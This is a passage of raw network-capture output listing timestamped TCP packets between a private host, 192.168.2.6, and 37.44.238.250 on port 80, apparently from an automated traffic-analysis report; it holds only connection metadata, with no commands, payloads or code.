                                                          Oct 1, 2024 05:58:13.215460062 CEST4975780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.292711020 CEST4975680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.293734074 CEST4975780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.298141003 CEST804975637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:13.298223019 CEST4975680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.298854113 CEST804975737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:13.302695036 CEST4975780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.310997963 CEST4975880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.315912008 CEST804975837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:13.318705082 CEST4975880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.318944931 CEST4975880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.323790073 CEST804975837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:13.669439077 CEST4975880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:13.674472094 CEST804975837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:13.930177927 CEST804975837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:13.980959892 CEST4975880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.058001041 CEST804975837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:14.105849028 CEST4975880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.181145906 CEST4975880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.181602955 CEST4975980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.186441898 CEST804975837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:14.186490059 CEST804975937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:14.186568022 CEST4975880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.186614990 CEST4975980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.186798096 CEST4975980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.191752911 CEST804975937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:14.543723106 CEST4975980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.548886061 CEST804975937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:14.821423054 CEST804975937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:14.871500015 CEST4975980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:14.956448078 CEST804975937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:15.012015104 CEST4975980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:15.086764097 CEST4975980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:15.087219000 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:15.092003107 CEST804975937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:15.092118979 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:15.092194080 CEST4975980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:15.092228889 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:15.092366934 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:15.097155094 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:15.449654102 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:15.454725981 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:15.729161978 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:15.777651072 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.022836924 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.074517965 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.078463078 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.078697920 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.230186939 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.235481024 CEST804976037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.238722086 CEST4976080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.259543896 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.264461994 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.264545918 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.264693975 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.269484997 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.621526003 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.626461983 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.870326042 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:16.918239117 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:16.997250080 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.043241024 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.117175102 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.117851973 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.122360945 CEST804976137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.122436047 CEST4976180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.122600079 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.122667074 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.122769117 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.127526999 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.480849028 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.485883951 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.728247881 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.777679920 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.861299038 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.918291092 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.985301018 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.985965967 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.990499973 CEST804976237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.990695953 CEST4976280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.990796089 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:17.994716883 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.994857073 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:17.999968052 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.028846979 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.033950090 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.034706116 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.034775019 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.039632082 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.340296984 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.345462084 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.387531042 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.392573118 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.392626047 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.621289015 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.662667036 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.668250084 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.715164900 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.753087997 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.757580042 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.762923956 CEST804976437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.762978077 CEST4976480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.808911085 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.943171978 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.943849087 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.948565960 CEST804976337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.948636055 CEST4976380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.948683977 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:18.948743105 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.948857069 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:18.953622103 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.293462038 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.298458099 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.556365967 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.605741024 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.687680006 CEST804976537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.730741024 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.961355925 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.966506958 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:19.966603041 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.966725111 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:19.971467018 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.324604034 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.329641104 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.581358910 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.621380091 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.709384918 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.762032032 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.834472895 CEST4976580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.835835934 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.836507082 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.840846062 CEST804976637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.841466904 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:20.841676950 CEST4976680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.841722965 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.841829062 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:20.846991062 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.199671984 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.204862118 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.451883078 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.496398926 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.581860065 CEST804976737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.621402025 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.696191072 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.701107979 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:21.701212883 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.701327085 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:21.706218958 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.058988094 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.063960075 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.327554941 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.371412039 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.461812019 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.512032986 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.585176945 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.585796118 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.590409040 CEST804976837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.590485096 CEST4976880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.590580940 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.590643883 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.590749025 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.595488071 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:22.949644089 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:22.954783916 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.225852013 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.277870893 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.358979940 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.402847052 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.476536036 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.477133036 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.481726885 CEST804976937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.481863022 CEST4976980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.481889009 CEST804977037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.481957912 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.482027054 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.488132954 CEST804977037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.762716055 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.810496092 CEST804977037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.880852938 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.885935068 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.886069059 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.887305021 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:23.892138004 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.927504063 CEST804977037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:23.927565098 CEST4977080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.098941088 CEST4976780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.100765944 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.105710983 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.105859041 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.105957031 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.110738993 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.246484995 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.251558065 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.251877069 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.465333939 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.470468044 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.509949923 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.558883905 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.640865088 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.684048891 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.711977959 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.762022972 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.841279984 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.887190104 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.961201906 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.961209059 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.961883068 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.966490984 CEST804977237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.966634035 CEST4977280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.966900110 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.966972113 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.967103958 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.967396021 CEST804977137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:24.967447996 CEST4977180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:24.971873999 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.324632883 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.329544067 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.582802057 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.637056112 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.719170094 CEST804977337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.762110949 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.846071005 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.850974083 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:25.851038933 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.851136923 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:25.855895042 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.200103045 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.205075979 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.467844963 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.512005091 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.599069118 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.652684927 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.735166073 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.736490011 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.740353107 CEST804977437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.740407944 CEST4977480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.741292000 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:26.741394043 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.741493940 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:26.746234894 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.090369940 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.095508099 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.385956049 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.433929920 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.518934011 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.558912992 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.635472059 CEST4977380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.637851954 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.639585972 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.643054008 CEST804977537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.643158913 CEST4977580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.644392014 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:27.644469023 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.644674063 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:27.649497032 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.013705969 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.018663883 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.307374001 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.355808973 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.476569891 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.527682066 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.602344990 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.603027105 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.607424021 CEST804977637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.607498884 CEST4977680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.607804060 CEST804977737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.607958078 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.608047962 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.612847090 CEST804977737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:28.994798899 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:28.999910116 CEST804977737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.283915997 CEST804977737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.340123892 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.453268051 CEST804977737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.496476889 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.572704077 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.573381901 CEST4977880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.577850103 CEST804977737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.577924967 CEST4977780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.578197002 CEST804977837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.578272104 CEST4977880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.578380108 CEST4977880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.583198071 CEST804977837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.653233051 CEST4977880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.653907061 CEST4977980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.658803940 CEST804977937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.658930063 CEST4977980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.659058094 CEST4977980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.663796902 CEST804977937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.702469110 CEST804977837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.774810076 CEST4978080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.779745102 CEST804978037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:29.779920101 CEST4978080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.780047894 CEST4978080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:29.784842968 CEST804978037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.012703896 CEST4977980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.015635014 CEST804977837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.015714884 CEST4977880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.017668009 CEST804977937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.017843962 CEST804977937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.137315035 CEST4978080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.142246008 CEST804978037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.271312952 CEST804977937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.324526072 CEST4977980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.392115116 CEST804978037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.433923960 CEST4978080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.466042995 CEST804977937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.512250900 CEST4977980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.521591902 CEST804978037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.574538946 CEST4978080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.651838064 CEST4977980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.651918888 CEST4978080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.653089046 CEST4978180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.657001019 CEST804977937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.657052994 CEST4977980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.657639027 CEST804978037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.657680988 CEST4978080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.657898903 CEST804978137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:30.657973051 CEST4978180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.658114910 CEST4978180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:30.662863016 CEST804978137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:31.012473106 CEST4978180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:31.017390013 CEST804978137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:31.327713013 CEST804978137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:31.371408939 CEST4978180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:31.461033106 CEST804978137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:31.461374998 CEST4978180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:31.466511011 CEST804978137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:31.466569901 CEST4978180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:31.682188988 CEST4978280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:31.687114000 CEST804978237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:31.687208891 CEST4978280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:31.776818037 CEST4978280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:31.781645060 CEST804978237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:32.121800900 CEST4978280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:32.126837969 CEST804978237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:32.319478035 CEST804978237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:32.371500969 CEST4978280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:32.492397070 CEST804978237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:32.543262005 CEST4978280192.168.2.637.44.238.250
